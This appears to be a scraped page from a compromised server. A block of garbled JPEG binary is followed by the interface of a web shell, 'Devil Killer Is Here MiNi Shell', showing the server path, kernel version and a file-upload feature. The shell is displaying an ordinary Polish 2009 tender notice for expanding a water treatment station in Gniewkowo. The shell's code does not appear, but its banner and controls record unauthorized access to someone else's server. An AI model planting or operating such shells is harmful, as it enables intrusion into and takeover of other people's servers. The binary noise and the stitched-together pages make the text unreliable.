JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/227404-N-2009.html

<p class="kh_header"><b>Gniewkowo: Rozbudowa stacji uzdatniania wody w Gniewkowie</b><br>
<b>Numer ogłoszenia: 227404 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Gniewkowie , ul. 17 Stycznia 11, 88-140 Gniewkowo, woj. kujawsko-pomorskie, tel. 052 3543014, faks 052 3543037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gniewkowo.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa stacji uzdatniania wody w Gniewkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest rozbudowa Stacji Uzdatniania Wody w miejscowości Gniewkowo. Ogólny opis przedmiotu zamówienia obejmuje:
a) budowę żelbetowego zbiornika retencyjnego o pojemności  500 m3. Przewiduje się budowę zbiornika o następujących parametrach technicznych: pojemność całkowita (użytkowa) V = 500,0 m3,  średnica 11,7 wysokość 5,3 m. Ściany o grubości 25cm, wewnętrzną ścianą dzielącą grubości 35cm. Przyjęto płytę okrągła, oparta na obwodzie i ścianie wewnętrznej dzielącej. Grubość płyty fundamentowej 500mm. Zbrojenie prętami o16mm co 200mm, pod ściana dzieląca pręty o20mm co 200mm.Grubość płyty stropowej 250mm o12mm co 90 i 180mm. Płytę fundamentową, ściany zewnętrzne, wewnętrzną ścianę dzieląca oraz płytę stropową  należy wykonać z betonu klasy B20. Zbiornik będzie podzielony na dwie, niezależne komory posiadające oddzielne zasilanie oraz oddzielne przewody ssawne i spustowe. Wyposażenie zbiornika stanowić będą: - rurociąg doprowadzający wodę uzdatnioną: 2 x PVC250, rurociąg odprowadzający wodę uzdatnioną (ssawny zestawu pompowego) 2 x PVC280,  rurociąg przelewowy - sprzężony z przelewem awaryjnym odstojnika (rów) o średnicy 2 x PVC250, rurociąg spustu zerowego o średnicy PVC110. Zbiornik należy wykonać w technologii żelbetowej - jako naziemny. Dwa rurociągi wody ssawnej z poszczególnych komór kierowane będą do zestawu pompowego, przy czym jeden z rurociągów będzie zasilał bezpośrednio pompę do płukania filtrów, drugi natomiast zestaw tłoczący wodę do sieci wodociągowej. W zbiorniku retencyjnym zostanie zastosowany system pomiarowy sterujący pracą ujęcia głębinowego. Opierać się on będzie o sondę hydrostatyczną mierzącą poziom wody w zbiorniku. Obok zbiornika należy usytuować komorę zasuw, która powinna stanowić wyodrębnioną konstrukcje posadowiona na odrębnej płycie fundamentowej. Płyta stropowa oraz płyta fundamentowa jako konstrukcja monolityczna. Ściany zewnętrzne wykonać z bloczków betonowych M6 grubości 25cm.
b) budowę budynku stacji o powierzchni 302,85 m2. Projektuje się budynek stacji uzdatniania wody jako obiekt jednokondygnacyjny, niepodpiwniczony o konstrukcji lekkiej, dach dwuspadowy o konstrukcji stalowej pokryty blacho dachówką. Powierzchnia terenu działki w granicach ogrodzenia - 3200m2. Powierzchnia zabudowy budynku hali filtrów  z łącznikiem - 302,85m2. Elementem wykonania zadania jest również adaptacja starego budynku stacji i dostosowania tego budynku do nowego rozwiązania. W ramach zadania przewiduje się demontaż niepotrzebnych elementów starej stacji w tym filtrów poziomych oraz hydroforu, przygotowanie pomieszczenia socjalnego, punktu dodawania chloru, wariantowej alkalizacji oraz pkt. dezynfekcji wody promieniami UV oraz zamieszczenia w tym budynku stacji pomp.
c) dostawa i montaż urządzeń uzdatniających wodę dla wydajności stacji 300 m3/h. Obecna stacja uzdatniania wody zasilana jest z 5 studni głębinowymi, zlokalizowanych w pobliżu  budynku stacji. Pobór wody następuje z utworów czwartorzędowych. Technologia obecnej stacji oparta jest o układ jednostopniowego pompowania, tj. pompy głębinowe tłoczą wodę poprzez 2 aeratory centralne, w których następuje napowietrzenie wody surowej, na 3 odżelaziacze piaskowe poziome, w których następuje jej uzdatnianie. Następnie poddawana jest alkalizacji za pomocą wodorotlenku sodowego przygotowanego w zbiornikach zarobowych. Następnie woda czysta poprzez 1 hydrofor tłoczona jest do sieci wodociągowej. Projekt przewiduje budowę nowej hali filtrów, w której zamontowane będą   2 stopnie filtracji składające się z: 2 aeratororów i 5 filtrów pionowych na każdym poziomie. Woda po dwustopniowej filtracji będzie posiadała możliwość dozowania podchlorynu sodu okresowo w miarę potrzeb. Wody popłuczne będące efektem płukania filtrów kierowane będą do istniejących zbiorników podziemnych. Woda ze zbiornika trafi do zestawu pompowego, sieciowego, który będzie zlokalizowany w istniejącym budynku stacji uzdatniania wody. Ostatnim etapem technologii będzie dezynfekcja wody z wykorzystaniem promieni UV poprzez separator zlokalizowany również w starym budynku stacji. Rozbudowę istniejącej stacji uzdatniania wody o: - zastąpienie istniejącej obudowy każdej ze studni głębinowej, obudową typu Langego, wykonaną z włókna poliestrowego
- montaż w nowo wybudowanej hali 10 filtrów o średnicy 2400 mm odżelaziająco-odmanganiających z centralnymi  2  aeratorami aerator ciśnieniowy - dynamiczny o średnica: 1000 mm i 2 aeratorów ciśnieniowych - statycznych: o  średnicy 1600mm  na dwie równoległe linie technologiczne uzdatniające wodą surową mieszaną. Płukanie złoża filtracyjnego - urządzenia przy pomocy dmuchawy o następujących parametrach technicznych: 1 szt. o wydajności 245,0 m3/h (przy częstotliwości 50,0 Hz). Elementy dodatkowego wyposażenia filtrów pierwszego stopnia stanowić będą: zawory odpowietrzające, manometry elektroniczne montowane na rurociągu po drugim stopniu napowietrzania oraz na rurociągu wody uzdatnionej po drugim stopniu filtracji,  kurki poboru wody do badań, przepływomierze.
Wypełnienie filtra - Filtry I stopnia będą wypełnione następującym złożem filtracyjnym:  I warstwa podtrzymująca z piasku kwarcowego o uziarnieniu 4,0 - 8,0 mm i wysokości 10,0 cm, - II warstwa podtrzymująca z piasku kwarcowego o uziarnieniu 2,0 - 4,0 mm i wysokości 10,0 cm, - właściwa warstwa filtracyjna z piasku chalcedonitowego o uziarnieniu 0,8 - 2,0mm i wysokości 1,60m. Całkowita wysokość złoża filtracyjnego zasypanego do filtra wyniesie zatem 1,80 m. Objętości złóż (i ich masa) wykorzystane na drugi stopień filtracji wyniosą: - I warstwa podtrzymująca: 2,50 m3 - ok. 3,8 t, - II warstwa podtrzymująca: 2,50 m3 - ok. 3,8 t, - złoże chalcedonitowe: 40,0 m3 ok. 44,0 t. Ogólne wytyczne budowlane są następujące: - hala filtrów powinna być wykończona materiałami odpornymi na wilgoć - wskazana opaska z płytek ceramicznych i stosowanie farb zmywalnych, - przed montażem pokrycia dachowego konieczny jest montaż filtrów, - konstrukcja hali powinna umożliwić demontaż każdego filtra oddzielnie (poprzez zastosowanie odpowiedniego, jeśli to możliwe rozstawu ram konstrukcyjnych - słupów nośnych), - zbiornik retencyjny wewnątrz wykończony odpowiednim materiałem odpornym na wilgoć i posiadającym atesty PZH, - wentylacja zgodnie z odpowiednim projektem branżowym, - wykończenie pompowni z płytek ceramicznych lub/i farby zmywalne, odporne na wilgoć, - w pompowni wentylacja mechaniczna (względem temperatury) i grawitacyjna, - w sterowni (łączniku) również wentylacja grawitacyjna i mechaniczna, - ze studni głębinowych istniejących nr 2 A i nr 3 BIS zlokalizowanych na terenie stacji wodociągowej  oraz ze studni przewidzianych do wykonania - uzupełniających planowanych na terenie poza stacją wodociągową - montaż zbiorników wyrównawczych , stalowych retencjonujących wodę uzdatnioną
- montaż pompowni IIo pracujących w oparciu o przetwornice częstotliwości - zasilających dwa odrębne systemy sieci wodociągowych. Dla powyższych parametrów dobrano następujący zestaw pompowy: - producent: Grundfos (lub równoważny), - wysokość podnoszenia: 40,0 mH2O, - wydajność tłoczenia przy 40,0 mH2O - 320,0 m3/h, - montaż pomp płucznych, sprężarek i dmuchawy oraz rurociągów i instalacji technologicznych z armaturą pomiarową i odcinającą.
d) wpięcie nowego zasilania w istniejący rurociąg wody surowej. Przepinkę należy wykonać po wybudowaniu i wstępnym odbiorze hali technologicznej. 
e) wykonanie rurociągów międzyobiektowych - wykonanie rurociągów międzyobiektowych. Orurowanie SUW wewnątrz hali filtrów (zgodnie z życzeniem inwestora) należy wykonać w oparciu o materiał PVC, z wykorzystaniem kształtek klejonych. Materiał: PVC-uH (nieplastyfikowany polichlorek winylu) materiał z wartością MRS (minimalną wymaganą wytrzymałością) przynajmniej 25 MPa (zgodnie z ISO 1167 - ISO DIS 9080). W miejscach połączeń kołnierzowych - również kołnierze z PVC-u. Pomiędzy kołnierzami uszczelki EPDM (guma etylenowo - propylenowa).
g) montowanie pompowni sieciowej, urządzenia do  dezynfekcji z wykorzystaniem promieni UV, zestaw do dozowania podchloryny sodu pompki dozującej i zestaw sieciowy w istniejącej hali filtrów. Urządzenia do chlorowania wody zostaną zlokalizowane w oddzielnym pomieszczeniu, wydzielonym na projekcie budowlanym. Pomieszczenie chlorowania przewiduje się w istniejącym budynek (przybudówce), zgodnie z odpowiednimi wymaganiami technicznymi. Pomieszczenie chlorowni zostanie wyposażone w następujące urządzenia: pompka dozująca, pojemnik roboczy na podchloryn sodu. Woda uzdatniona z dwóch komór zbiornika retencyjnego oddzielnie będzie rurociągami o średnicy 280 kierowana na zestaw pompowy do sieci oraz pompę płuczącą. Pompownia sieciowa zostanie dobrana na następującą wartość rozbiorów i ciśnienia: - zachowana zostanie istniejąca przepompowania wód popłucznych i odstojnik wód popłucznych, - wydzielenie pomieszczenia socjalnego, wc i prysznic.
h) roboty elektryczne. Roboty elektryczne, AKPiA wraz z włączeniem do istniejącego systemu sterowania i wizualizacji z wykorzystaniem transmisji bezprzewodowej wraz z włączeniem do istniejącego systemu sterowania i wizualizacji z wykorzystaniem transmisji bezprzewodowe. Na potrzeby nowego budynku technologicznego projektuje się wykonanie rozdziel  wraz z włączeniem do istniejącego systemu sterowania i wizualizacji z wykorzystaniem transmisji bezprzewodowej. 
i)  ogrzewanie elektryczne,
j) zagospodarowanie terenu zagospodarowanie terenu - zakres robót zawarty obejmuje prowadzenie robót  ziemnych i montażowych: - obrzeża betonowe - 254 m, - drogi dojazdowe nawierzchnie z kostki betonowej grub. 8 cm - 400 m2, - chodnik nawierzchnie z kostki betonowej grub. 6 cm - 123,5 m2, -  istniejące ogrodzenie terenu - z siatki stalowej na fundamencie betonowym,
k) teren objęty opracowaniem jest uzbrojony w sieć wodno-kanalizacyjną i energetyczną
II. Zamawiający dopuszcza rozwiązania równoważne opisane w przedmiocie zamówienia
Jeśli gdziekolwiek w SIWZ przedmiot zamówienia określony został przez wskazanie znaków towarowych lub pochodzenie materiałów, to Zamawiający dopuszcza możliwość zastosowania urządzeń równoważnych w stosunku do zaprojektowanych z zachowaniem tych samych standardów technicznych, technologicznych i jakościowych. Przez pojęcie materiałów równoważnych należy rozumieć materiały gwarantujące realizację robót zgodnie z wydanym pozwoleniem na budowę oraz zapewniające uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót oraz w przedmiarach robót.
Wykaz zastosowanych i przyjętych przez Wykonawcę do wyceny materiałów lub urządzeń równoważnych musi zostać załączony do oferty. Koniecznym jest podanie nazwy producenta, precyzyjnego i jednoznacznego typu urządzenia oraz załączenie niezbędnych dokumentów, takich jak: atest PZH, deklaracja zgodności producenta / aprobata techniczna, karta katalogowa producenta zawierająca wszystkie parametry techniczno-eksploatacyjne ujęte w dokumentacji projektowej. 
Zastosowanie filtrów równoważnych oznacza konieczność załączenia przez Wykonawcę do oferty następujących załączników:
a) Rysunek techniczny: rzut z góry, boku, przodu, tyłu i dołu.
b) Atest PZH na kompletny filtr.
c) Aprobata techniczna na kompletny filtr.
d) Krzywe przesiewu złóż wykonanych przez upoważnioną do tego typu badań jednostkę badawczą. 
e) Graficzny schemat płukania filtrów. 
f) Graficzny schemat instalacji sterującej.
Zamawiający nie wyraża zgody, by proponowane w ofercie urządzenia równoważne były prototypami. Wymogiem bezwzględnym jest, by były to urządzenia sprawdzone, pracujące na innych zrealizowanych obiektach przez okres nie krótszy, niż okres gwarancji jaki posiadają urządzenia przyjęte w dokumentacji projektowej. Zamawiający zastrzega sobie prawo dokonania oględzin i sprawdzenia poprawności działania urządzenia równoważnego pracującego na wskazanym obiekcie. Zamawiający wymagać będzie od Wykonawcy, którego oferta zostanie wybrana, wykonania przedmiotu zamówienia zgodnie z opracowanym projektem, szczególnie w zakresie efektów uzdatniania wody, kosztów eksploatacji, niezawodności działania. Wykonawca musi mieć świadomość, iż możliwość zastosowania urządzeń równoważnych uzależniona będzie od ich zgodności ze wszystkimi parametrami określonymi w projekcie, specyfikacji technicznej oraz akceptacji inspektora nadzoru i projektanta

III. Wykonawca w ciągu 3 miesięcy od zakończenia inwestycji uzyska dopuszczenie urządzeń do użytkowania przez Urząd Dozoru Technicznego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.23.24.30-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wyznacza wadium w wysokości 50.000 zł (słownie: pięćdziesiąt tysięcy złotych). Wadium wnoszone jest przez wykonawców zaproszonych do składania ofert przed upływem terminu do składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
a) wykażą i udokumentują (referencje lub listy polecające) w okresie ostatnich 5 lat przed wszczęciem postępowania (VI.2004 - VI.2009), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, wykonanie co najmniej trzy roboty budowlane odpowiadających swoim rodzajem przedmiotowi zamówienia, a dotyczące budowy, rozbudowy lub przebudowy stacji uzdatniania wody o wydajności  nie mniejszej niż Q= 200 m3/h, w tym co najmniej dwóch stacji  o wartości co najmniej 2.000.000 zł brutto każda oraz co najmniej trzech robót związanych z wykonaniem i uruchomieniem systemu sterowania i monitoringu z wykorzystaniem bezprzewodowej transmisji danych (radiowej lub GPRS) na obiektach wodociągowych (SUW, hydrofornie, studnie głębinowe itp.)
b) dysponują osobami, które mogą być wyznaczona na stanowiska: a) Kierownika Budowy z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno - budowlanej lub specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń. Kierownik budowy winien posiadać co najmniej 5 lat doświadczenia zawodowego na stanowisku Kierownika Budowy z zakresu robót konstrukcyjno-budowlanych lub robót sanitarnych, b) kierownika robót budowlanych z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno - budowlanej bez ograniczeń, oraz co najmniej 3 lata doświadczenia zawodowego na stanowisku Kierownika Robót Budowlanych, c) kierownika robót sanitarnych z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, oraz co najmniej 3 lata doświadczenia zawodowego na stanowisku Kierownika Robót Sanitarnych d) kierownika robót elektrycznych z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, oraz co najmniej 3 lata doświadczenia zawodowego na stanowisku Kierownika Robót Elektrycznych.  Uprawnienia kadry kierowniczej muszą odpowiadać wymaganiom określonym w art.12 i 12a ustawy z dnia 7 lipca 1994r Prawo budowlane, Kadra kierująca budową musi posiadać stwierdzenia przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego, a jeżeli posiada uprawnienia wydane po 14.02.1995r - zaświadczenie lub decyzję o wpisie do centralnego rejestru prowadzonego przez Głównego Inspektora Nadzoru Budowlanego, 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia: 
a) dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub dostęp do kredytu w wysokości min. 900.000 zł,
b) osiągnęli w każdym z ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy , za ten okres - przychody ze sprzedaży na poziomie ponad 5.000.000 zł. rocznie. 
c) posiadają polisę ubezpieczoną OC z tytułu działalności gospodarczej w zakresie co najmniej podstawowym na kwotę nie mniejszą niż 1.000.000 zł.
4) nie podlegają wykluczeniu w rozumieniu art.24 ustawy Prawo zamówień publicznych, 
5) wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego i którzy wspólnie zamierzają składać ofertę muszą wykazać, że: - każdy z osobna: nie podlegają wykluczeniu z postępowania, posiadają uprawnienia do działalności w zakresie objętym zamówieniem zgodnie z wymaganiami ustawowymi, - wspólnie muszą wykazać, że: posiadają uprawnienia do wykonywania czynności przewidzianych do zrealizowania przedmiotu zamówienia (osoby z uprawnieniami budowlanymi), posiadają wiedzę i doświadczenie wymagane przez zamawiającego oraz znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
B. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.
B.1. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły - spełnia/nie spełnia w oparciu o informacje zawarte w poniższych dokumentach i oświadczeniach dołączonych do wniosku o dopuszczenie do udziału w przetargu. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia niżej wymienione warunki.
1.Osoby przewidziane do kierowania budową posiadają odpowiednie uprawnienia w zakresie i specjalności, stosownie do rodzaju wykonywanych czynności odpowiadające wymaganiom budowy. 
2. Wykonawca posiada odpowiednie doświadczenie.
3. Wykonawcy nie zalegają z należnymi opłatami i składkami wobec Skarbu Państwa (ZUS i US ). 
4.Posiadają niezbędną ilość środków finansowych gwarantujących bieżące wykonywanie zamówienia - minimum 900.000 zł. 
5. Osiągnęli w każdym z ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy , za ten okres - obroty na poziomie ponad 5.000.000zł rocznie.
6. Posiadają polisę ubezpieczoną OC na warunkach na kwotę nie mniejszą niż 1.000.000.
B.2. Ocena posiadania niezbędnej wiedzy i doświadczenia wykonawcy. Ocenie będzie podlegać ilość wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy- za ten okres, robót budowlanych odpowiadających swoim rodzajem przedmiotowi zamówienia a dotyczących budowy, rozbudowy lub przebudowy stacji uzdatniania wody o wydajności  nie mniejszej niż Q= 200 m3/h, o wartości co najmniej 2.000.000 zł brutto każda. 
Sposób oceny spełniania warunku: za wykonanie jednej roboty budowlanej określonej w pkt. B.2. Zamawiający przyzna Wykonawcy 1 pkt. Oceną za powyższy warunek będzie uzyskana ilość punktów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków w ubieganiu się o udzielenie zamówienia publicznego ( jeżeli wniosek jest składany wspólnie przez kilka podmiotów, oświadczenie niniejsze powinno być złożone, jako jedno i podpisane przez wszystkich partnerów lub ich pełnomocnika ). 
2. aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia,
3. Oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( jeżeli wniosek jest składany wspólnie przez kilka podmiotów, oświadczenie niniejsze powinno być złożone osobno przez każdego z partnerów ). 
4..Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków do udziału w postępowaniu. 
5.Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z krótkimi informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnymi do wykonania zamówienia wraz z uprawnieniami oraz aktualnymi zaświadczeniami wpisu na listę właściwej Okręgowej Izby Samorządu Zawodowego i wg potrzeby zaświadczenia lub decyzje o wpisie do rejestru prowadzonego przez Głównego Inspektora nadzoru Budowlanego. 
6. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy (nie mniej niż 900.000 zł), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków. 
7.Polisa ubezpieczeniowa lub inny dokument potwierdzający ubezpieczenie OC z tytułu prowadzenia działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 1.000.000 zł.
8.Wykaz wykonanych w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy- za ten okres) robót budowlanych odpowiadających swoim rodzajem przedmiotowi zamówienia, a dotyczące budowy, rozbudowy lub przebudowy stacji uzdatniania wody o wydajności  nie mniejszej niż Q= 200 m3/h, w tym co najmniej dwóch stacji  o wartości co najmniej 2.000.000 zł brutto oraz co najmniej trzech robót związanych z wykonaniem i uruchomieniem systemu sterowania i monitoringu z wykorzystaniem bezprzewodowej transmisji danych (radiowej lub GPRS) na obiektach wodociągowych (SUW, hydrofornie, studnie głębinowe itp.) wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie. 
9. Dokument określający obroty za lata 2006, 2007 i 2008, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres; określający obrót na poziomie ponad 5.000.000 zł rocznie. 
10. Pełnomocnictwo (jeśli dotyczy)
